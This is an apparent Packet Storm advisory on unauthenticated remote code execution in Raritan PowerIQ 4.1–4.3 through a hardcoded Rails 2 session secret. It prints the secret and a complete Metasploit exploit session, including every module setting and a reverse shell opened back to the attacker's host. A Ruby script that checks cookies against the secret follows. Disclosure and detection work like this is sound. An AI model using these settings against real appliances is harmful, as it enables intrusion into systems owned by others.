Raritan PowerIQ 4.1 / 4.2 / 4.3 Code Execution

12 Mar 2015 | Reported by Brandon Perry | Type: packetstorm | Source: packetstormsecurity.com

Raritan PowerIQ 4.1 / 4.2 / 4.3 code execution vulnerability: the Rails 2 web interface ships with a hardcoded session secret.

Raritan PowerIQ versions 4.1, 4.2, and 4.3 ship with a Rails 2 web interface with a hardcoded session secret of 8e238c9702412d475a4c44b7726a0537.

This can be used to achieve unauthenticated remote code execution as the nginx user on vulnerable systems.

```
msf exploit(rails_secret_deserialization) > show options

Module options (exploit/multi/http/rails_secret_deserialization):

   Name             Current Setting                           Required  Description
   ----             ---------------                           --------  -----------
   COOKIE_NAME                                                no        The name of the session cookie
   DIGEST_NAME      SHA1                                      yes       The digest type used to HMAC the session cookie
   HTTP_METHOD      GET                                       yes       The HTTP request method (GET, POST, PUT typically work)
   Proxies                                                    no        A proxy chain of format type:host:port[,type:host:port][...]
   RAILSVERSION     3                                         yes       The target Rails Version (use 3 for Rails3 and 2, 4 for Rails4)
   RHOST            192.168.0.20                              yes       The target address
   RPORT            443                                       yes       The target port
   SALTENC          BAh7CUkiCXNrZXkGOgZFRkkiFTgzMzVmNDY2ZDdmOTI2Y2IGOwBUSSINbGljZW5zZWQGOwBGVEkiD3Nlc3Npb25faWQGOwBUSSIlNGJlNzA2Nzk2NWFjYjFmNzU2ZThiY2IyNGVkNWM0MDMGOwBUSSIOcmV0dXJuX3RvBjsARiIGLw==  yes  The encrypted cookie salt
   SALTSIG          42df31d8a91b45e5ad3e9f3213dc5d6859df1cf8  yes       The signed encrypted cookie salt
   SECRET           8e238c9702412d475a4c44b7726a0537          yes       The secret_token (Rails3) or secret_key_base (Rails4) of the application (needed to sign the cookie)
   TARGETURI        /login/login                              yes       The path to a vulnerable Ruby on Rails application
   VALIDATE_COOKIE  true                                      no        Only send the payload if the session cookie is validated
   VHOST                                                      no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(rails_secret_deserialization) > exploit

[*] Started reverse handler on 192.168.0.19:4444
[*] Checking for cookie
[*] Adjusting cookie name to _session_id
[+] SECRET matches! Sending exploit payload
[*] Sending cookie _session_id
[*] Command shell session 1 opened (192.168.0.19:4444 -> 192.168.0.20:43729) at 2015-03-11 19:45:20 -0500

id
uid=498(nginx) gid=498(nginx) groups=498(nginx),100(users)
```

--
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website
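The module's "SECRET matches!" step is an HMAC check: a Rails 2 cookie-store session is `base64(Marshal.dump(session))--hexdigest`, and the hexdigest is HMAC-SHA1 of the base64 text under the application secret. The Ruby below is an added example, not code from the advisory or from the Metasploit module; it lets an operator take the `_session_id` cookie from their own PowerIQ appliance and confirm whether it still validates under the published secret (the cookie value and file name in the usage line are assumptions).

```ruby
# Added example, not from the advisory or the Metasploit module: check whether a
# Rails 2 cookie-store session cookie validates under a known secret.
require 'openssl'

# Secret published in the advisory for PowerIQ 4.1, 4.2 and 4.3.
KNOWN_HARDCODED_SECRET = '8e238c9702412d475a4c44b7726a0537'.freeze

# Rails 2 cookie store layout: "<base64(Marshal.dump(session))>--<hex HMAC>".
# The signature covers the base64 text; the default digest is SHA1 (DIGEST_NAME).
def rails2_signature(data, secret, digest = 'SHA1')
  OpenSSL::HMAC.hexdigest(digest, secret, data)
end

# Percent-decode a value pasted from a Cookie header. CGI.unescape would turn
# the base64 '+' into a space, so only %XX sequences are decoded here.
def percent_decode(value)
  value.to_s.gsub(/%([0-9A-Fa-f]{2})/) { Regexp.last_match(1).hex.chr }
end

# Constant-time comparison so the checker itself does not leak timing information.
def secure_equal?(a, b)
  return false unless a.bytesize == b.bytesize
  a.bytes.zip(b.bytes).reduce(0) { |acc, (x, y)| acc | (x ^ y) }.zero?
end

# True when +cookie+ (the raw _session_id value) carries a valid HMAC under
# +secret+. A true result against KNOWN_HARDCODED_SECRET means the appliance is
# still running with the secret from the advisory and must be treated as exposed.
def cookie_signed_with?(cookie, secret, digest = 'SHA1')
  data, sig = percent_decode(cookie).split('--', 2)
  return false if data.nil? || data.empty? || sig.nil? || sig.empty?
  secure_equal?(rails2_signature(data, secret, digest), sig.strip.downcase)
end

def vulnerable_to_hardcoded_secret?(cookie)
  cookie_signed_with?(cookie, KNOWN_HARDCODED_SECRET)
end

# Usage (assumed file name): ruby check_poweriq_secret.rb '<_session_id cookie value>'
if __FILE__ == $PROGRAM_NAME && ARGV[0]
  if vulnerable_to_hardcoded_secret?(ARGV[0])
    puts 'VULNERABLE: session cookie validates under the published secret'
  else
    puts 'Cookie does not validate under the published secret'
  end
end
```

A cookie that validates here is forgeable by anyone who has read the advisory, so VALIDATE_COOKIE passing on the module side is the same signal; the fix is a vendor build that generates a per-installation secret.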
